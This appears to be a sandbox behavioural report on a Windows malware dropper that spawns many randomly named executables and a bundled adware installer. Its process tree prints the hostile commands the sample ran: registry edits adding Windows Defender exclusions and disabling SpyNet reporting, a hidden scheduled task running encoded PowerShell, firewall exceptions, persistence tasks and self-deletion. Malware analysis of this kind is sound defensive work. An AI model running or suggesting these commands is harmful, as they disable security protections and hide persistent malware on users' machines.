Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

LDSbuQRihOeKtKJpQqnWTvQf.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings LDSbuQRihOeKtKJpQqnWTvQf.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1632 reg.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1632 PING.EXE
4592 PING.EXE
5488 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 140 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	LDSbuQRihOeKtKJpQqnWTvQf.exe

pid	process
1632	reg.exe

pid	process
1632	PING.EXE
4592	PING.EXE
5488	PING.EXE

description	flow	ioc
HTTP User-Agent header	140	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pWj0tbKPBIqzl8cWzJJduyGL.exeGAoB14GSP2133Y2sgeRaXsqZ.exe0a2MjfgeUg1OpH55ydagt_Xk.exe

pid	process
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
3576	GAoB14GSP2133Y2sgeRaXsqZ.exe
3576	GAoB14GSP2133Y2sgeRaXsqZ.exe
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212
2956	0a2MjfgeUg1OpH55ydagt_Xk.exe
2956	0a2MjfgeUg1OpH55ydagt_Xk.exe
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

yv0boMk9qm661CDaxW2QCjxR.exe

pid process

2212
8 yv0boMk9qm661CDaxW2QCjxR.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

GAoB14GSP2133Y2sgeRaXsqZ.exe

pid process

3576 GAoB14GSP2133Y2sgeRaXsqZ.exe

pid	process
2212
8	yv0boMk9qm661CDaxW2QCjxR.exe

pid	process
3576	GAoB14GSP2133Y2sgeRaXsqZ.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

eBBPs9p8UcczEuumUSDGSxxB.exerobocopy.exetaskkill.exe6y4NS38kRIyK2Z25oW9VrEFh.exeDnsService.exe

description	pid	process
Token: SeDebugPrivilege	2328	eBBPs9p8UcczEuumUSDGSxxB.exe
Token: SeBackupPrivilege	4940	robocopy.exe
Token: SeRestorePrivilege	4940	robocopy.exe
Token: SeSecurityPrivilege	4940	robocopy.exe
Token: SeTakeOwnershipPrivilege	4940	robocopy.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeDebugPrivilege	3092	6y4NS38kRIyK2Z25oW9VrEFh.exe
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeDebugPrivilege	3988	DnsService.exe
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

D5rdmmEor9e88AqOP7wSSW07.tmpAdblock.exeQuite.exe.pifComparisons.exe.pif

pid	process
652	D5rdmmEor9e88AqOP7wSSW07.tmp
4248	Adblock.exe
2212
2212
2472	Quite.exe.pif
2212
2212
2472	Quite.exe.pif
2472	Quite.exe.pif
2212
2212
3780	Comparisons.exe.pif
2212
2212
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif
2212
2212
2212
2212
2212
2212
2212
2212
2212
2212

Suspicious use of SendNotifyMessage 10 IoCs

Processes:

Adblock.exeQuite.exe.pifComparisons.exe.pif

pid	process
4248	Adblock.exe
2212
2212
2212
2472	Quite.exe.pif
2472	Quite.exe.pif
2472	Quite.exe.pif
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Adblock.exe

pid process

4248 Adblock.exe
4248 Adblock.exe
4248 Adblock.exe
4248 Adblock.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exepWj0tbKPBIqzl8cWzJJduyGL.exeD5rdmmEor9e88AqOP7wSSW07.exepY2mcXl4cTwjPt93kUE8Pf6n.exeMQTpTD4UMUpqKOnazuXqlAv0.exeLDSbuQRihOeKtKJpQqnWTvQf.exe1xOiJqj_MxGvI6EvRdq5Rfgc.exe

description	pid	process	target process
PID 2604 wrote to memory of 4960	2604	tmp.exe	pWj0tbKPBIqzl8cWzJJduyGL.exe
PID 2604 wrote to memory of 4960	2604	tmp.exe	pWj0tbKPBIqzl8cWzJJduyGL.exe
PID 2604 wrote to memory of 4960	2604	tmp.exe	pWj0tbKPBIqzl8cWzJJduyGL.exe
PID 2604 wrote to memory of 508	2604	tmp.exe	schtasks.exe
PID 2604 wrote to memory of 508	2604	tmp.exe	schtasks.exe
PID 2604 wrote to memory of 508	2604	tmp.exe	schtasks.exe
PID 2604 wrote to memory of 2040	2604	tmp.exe	schtasks.exe
PID 2604 wrote to memory of 2040	2604	tmp.exe	schtasks.exe
PID 2604 wrote to memory of 2040	2604	tmp.exe	schtasks.exe
PID 4960 wrote to memory of 3092	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	6y4NS38kRIyK2Z25oW9VrEFh.exe
PID 4960 wrote to memory of 3092	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	6y4NS38kRIyK2Z25oW9VrEFh.exe
PID 4960 wrote to memory of 3092	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	6y4NS38kRIyK2Z25oW9VrEFh.exe
PID 4960 wrote to memory of 2328	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	eBBPs9p8UcczEuumUSDGSxxB.exe
PID 4960 wrote to memory of 2328	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	eBBPs9p8UcczEuumUSDGSxxB.exe
PID 4960 wrote to memory of 2328	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	eBBPs9p8UcczEuumUSDGSxxB.exe
PID 4960 wrote to memory of 3208	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	D5rdmmEor9e88AqOP7wSSW07.exe
PID 4960 wrote to memory of 3208	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	D5rdmmEor9e88AqOP7wSSW07.exe
PID 4960 wrote to memory of 3208	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	D5rdmmEor9e88AqOP7wSSW07.exe
PID 4960 wrote to memory of 4084	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	lw4HgUE2VHomfhZybqsJpcPN.exe
PID 4960 wrote to memory of 4084	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	lw4HgUE2VHomfhZybqsJpcPN.exe
PID 4960 wrote to memory of 4084	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	lw4HgUE2VHomfhZybqsJpcPN.exe
PID 4960 wrote to memory of 4060	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	1xOiJqj_MxGvI6EvRdq5Rfgc.exe
PID 4960 wrote to memory of 4060	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	1xOiJqj_MxGvI6EvRdq5Rfgc.exe
PID 4960 wrote to memory of 4060	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	1xOiJqj_MxGvI6EvRdq5Rfgc.exe
PID 4960 wrote to memory of 4652	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	WerFault.exe
PID 4960 wrote to memory of 4652	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	WerFault.exe
PID 4960 wrote to memory of 3576	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	GAoB14GSP2133Y2sgeRaXsqZ.exe
PID 4960 wrote to memory of 3576	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	GAoB14GSP2133Y2sgeRaXsqZ.exe
PID 4960 wrote to memory of 3576	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	GAoB14GSP2133Y2sgeRaXsqZ.exe
PID 4960 wrote to memory of 2956	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	0a2MjfgeUg1OpH55ydagt_Xk.exe
PID 4960 wrote to memory of 2956	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	0a2MjfgeUg1OpH55ydagt_Xk.exe
PID 4960 wrote to memory of 2956	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	0a2MjfgeUg1OpH55ydagt_Xk.exe
PID 4960 wrote to memory of 8	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	yv0boMk9qm661CDaxW2QCjxR.exe
PID 4960 wrote to memory of 8	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	yv0boMk9qm661CDaxW2QCjxR.exe
PID 4960 wrote to memory of 8	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	yv0boMk9qm661CDaxW2QCjxR.exe
PID 4960 wrote to memory of 2548	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	MQTpTD4UMUpqKOnazuXqlAv0.exe
PID 4960 wrote to memory of 2548	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	MQTpTD4UMUpqKOnazuXqlAv0.exe
PID 4960 wrote to memory of 2548	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	MQTpTD4UMUpqKOnazuXqlAv0.exe
PID 4960 wrote to memory of 4224	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	ShoibKSKqd2CZrfAjbtNGyiK.exe
PID 4960 wrote to memory of 4224	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	ShoibKSKqd2CZrfAjbtNGyiK.exe
PID 4960 wrote to memory of 3732	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	pY2mcXl4cTwjPt93kUE8Pf6n.exe
PID 4960 wrote to memory of 3732	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	pY2mcXl4cTwjPt93kUE8Pf6n.exe
PID 4960 wrote to memory of 3732	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	pY2mcXl4cTwjPt93kUE8Pf6n.exe
PID 4960 wrote to memory of 1852	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	LDSbuQRihOeKtKJpQqnWTvQf.exe
PID 4960 wrote to memory of 1852	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	LDSbuQRihOeKtKJpQqnWTvQf.exe
PID 4960 wrote to memory of 1852	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	LDSbuQRihOeKtKJpQqnWTvQf.exe
PID 4960 wrote to memory of 4472	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	VLxhOe2ZaQSVLOWkXp1aonVr.exe
PID 4960 wrote to memory of 4472	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	VLxhOe2ZaQSVLOWkXp1aonVr.exe
PID 4960 wrote to memory of 4472	4960	pWj0tbKPBIqzl8cWzJJduyGL.exe	VLxhOe2ZaQSVLOWkXp1aonVr.exe
PID 3208 wrote to memory of 652	3208	D5rdmmEor9e88AqOP7wSSW07.exe	D5rdmmEor9e88AqOP7wSSW07.tmp
PID 3208 wrote to memory of 652	3208	D5rdmmEor9e88AqOP7wSSW07.exe	D5rdmmEor9e88AqOP7wSSW07.tmp
PID 3208 wrote to memory of 652	3208	D5rdmmEor9e88AqOP7wSSW07.exe	D5rdmmEor9e88AqOP7wSSW07.tmp
PID 3732 wrote to memory of 4940	3732	pY2mcXl4cTwjPt93kUE8Pf6n.exe	robocopy.exe
PID 3732 wrote to memory of 4940	3732	pY2mcXl4cTwjPt93kUE8Pf6n.exe	robocopy.exe
PID 3732 wrote to memory of 4940	3732	pY2mcXl4cTwjPt93kUE8Pf6n.exe	robocopy.exe
PID 2548 wrote to memory of 4016	2548	MQTpTD4UMUpqKOnazuXqlAv0.exe	bitsadmin.exe
PID 2548 wrote to memory of 4016	2548	MQTpTD4UMUpqKOnazuXqlAv0.exe	bitsadmin.exe
PID 2548 wrote to memory of 4016	2548	MQTpTD4UMUpqKOnazuXqlAv0.exe	bitsadmin.exe
PID 1852 wrote to memory of 3892	1852	LDSbuQRihOeKtKJpQqnWTvQf.exe	control.exe
PID 1852 wrote to memory of 3892	1852	LDSbuQRihOeKtKJpQqnWTvQf.exe	control.exe
PID 1852 wrote to memory of 3892	1852	LDSbuQRihOeKtKJpQqnWTvQf.exe	control.exe
PID 4060 wrote to memory of 60	4060	1xOiJqj_MxGvI6EvRdq5Rfgc.exe	Install.exe
PID 4060 wrote to memory of 60	4060	1xOiJqj_MxGvI6EvRdq5Rfgc.exe	Install.exe
PID 4060 wrote to memory of 60	4060	1xOiJqj_MxGvI6EvRdq5Rfgc.exe	Install.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2604

C:\Users\Admin\Documents\pWj0tbKPBIqzl8cWzJJduyGL.exe
"C:\Users\Admin\Documents\pWj0tbKPBIqzl8cWzJJduyGL.exe"
2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4960

C:\Users\Admin\Pictures\Adobe Films\eBBPs9p8UcczEuumUSDGSxxB.exe
"C:\Users\Admin\Pictures\Adobe Films\eBBPs9p8UcczEuumUSDGSxxB.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:3924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:640

C:\Users\Admin\Pictures\Adobe Films\6y4NS38kRIyK2Z25oW9VrEFh.exe
"C:\Users\Admin\Pictures\Adobe Films\6y4NS38kRIyK2Z25oW9VrEFh.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3092

C:\Users\Admin\Pictures\Adobe Films\D5rdmmEor9e88AqOP7wSSW07.exe
"C:\Users\Admin\Pictures\Adobe Films\D5rdmmEor9e88AqOP7wSSW07.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3208

C:\Users\Admin\AppData\Local\Temp\is-6S2PC.tmp\D5rdmmEor9e88AqOP7wSSW07.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6S2PC.tmp\D5rdmmEor9e88AqOP7wSSW07.tmp" /SL5="$D01CA,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\D5rdmmEor9e88AqOP7wSSW07.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:652

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=e32e1c791664134762 --downloadDate=2022-09-25T19:38:46 --distId=marketator --pid=747
5⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4248

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\27ea924e-c956-4b92-dc84-77225bac19d4.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\27ea924e-c956-4b92-dc84-77225bac19d4.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\27ea924e-c956-4b92-dc84-77225bac19d4.run\__sentry-breadcrumb2" --initial-client-data=0x3f4,0x3f8,0x3fc,0x3d0,0x3c8,0x7ff61981bc80,0x7ff61981bca0,0x7ff61981bcb8
6⤵
- Executes dropped EXE
PID:2636

C:\Users\Admin\AppData\Local\Temp\Update-fb1d68ce-d9a9-4932-b0f2-e49c7ca0a81d\AdblockInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\Update-fb1d68ce-d9a9-4932-b0f2-e49c7ca0a81d\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
6⤵
- Executes dropped EXE
PID:2396

C:\Users\Admin\AppData\Local\Temp\is-S4Q6P.tmp\AdblockInstaller.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S4Q6P.tmp\AdblockInstaller.tmp" /SL5="$2025A,15557677,792064,C:\Users\Admin\AppData\Local\Temp\Update-fb1d68ce-d9a9-4932-b0f2-e49c7ca0a81d\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1408

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
6⤵
- Modifies Windows Firewall
PID:5028

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4480

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -start
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3700

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
5⤵
PID:232

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
6⤵
PID:1156

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
5⤵
PID:824

C:\Windows\system32\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
6⤵
- Modifies registry key
PID:1632

C:\Users\Admin\Pictures\Adobe Films\0a2MjfgeUg1OpH55ydagt_Xk.exe
"C:\Users\Admin\Pictures\Adobe Films\0a2MjfgeUg1OpH55ydagt_Xk.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2956

C:\ProgramData\54258592853842761999.exe
"C:\ProgramData\54258592853842761999.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2180

C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe
"C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
PID:4196

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\b3f32abb88\rovwer.exe" /F
6⤵
- Creates scheduled task(s)
PID:4388

C:\Users\Admin\AppData\Local\Temp\1000003001\socksupd.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\socksupd.exe"
6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 480
7⤵
- Program crash
PID:6140

C:\Users\Admin\AppData\Local\Temp\1000004001\winupdater.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\winupdater.exe"
6⤵
- Executes dropped EXE
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
7⤵
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1128
5⤵
- Program crash
PID:1076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" S/c taskkill /im 0a2MjfgeUg1OpH55ydagt_Xk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\0a2MjfgeUg1OpH55ydagt_Xk.exe" & del C:\PrograData\*.dll & exit
4⤵
PID:3424

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 0a2MjfgeUg1OpH55ydagt_Xk.exe /f
5⤵
- Kills process with taskkill
PID:3988

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 2076
4⤵
- Program crash
PID:4000

C:\Users\Admin\Pictures\Adobe Films\1xOiJqj_MxGvI6EvRdq5Rfgc.exe
"C:\Users\Admin\Pictures\Adobe Films\1xOiJqj_MxGvI6EvRdq5Rfgc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4060

C:\Users\Admin\AppData\Local\Temp\7zS4779.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
PID:60

C:\Users\Admin\AppData\Local\Temp\7zS6736.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:4148

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:3488

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2236

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:5008

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:1556

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2724

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:4004

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:4028

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:1476

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPZnUtuki" /SC once /ST 00:21:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:3840

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPZnUtuki"
6⤵
PID:3648

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPZnUtuki"
6⤵
PID:5124

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 19:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\umJBJNs.exe\" Qf /site_id 525403 /S" /V1 /F
6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5164

C:\Users\Admin\Pictures\Adobe Films\GAoB14GSP2133Y2sgeRaXsqZ.exe
"C:\Users\Admin\Pictures\Adobe Films\GAoB14GSP2133Y2sgeRaXsqZ.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3576

C:\Users\Admin\Pictures\Adobe Films\lw4HgUE2VHomfhZybqsJpcPN.exe
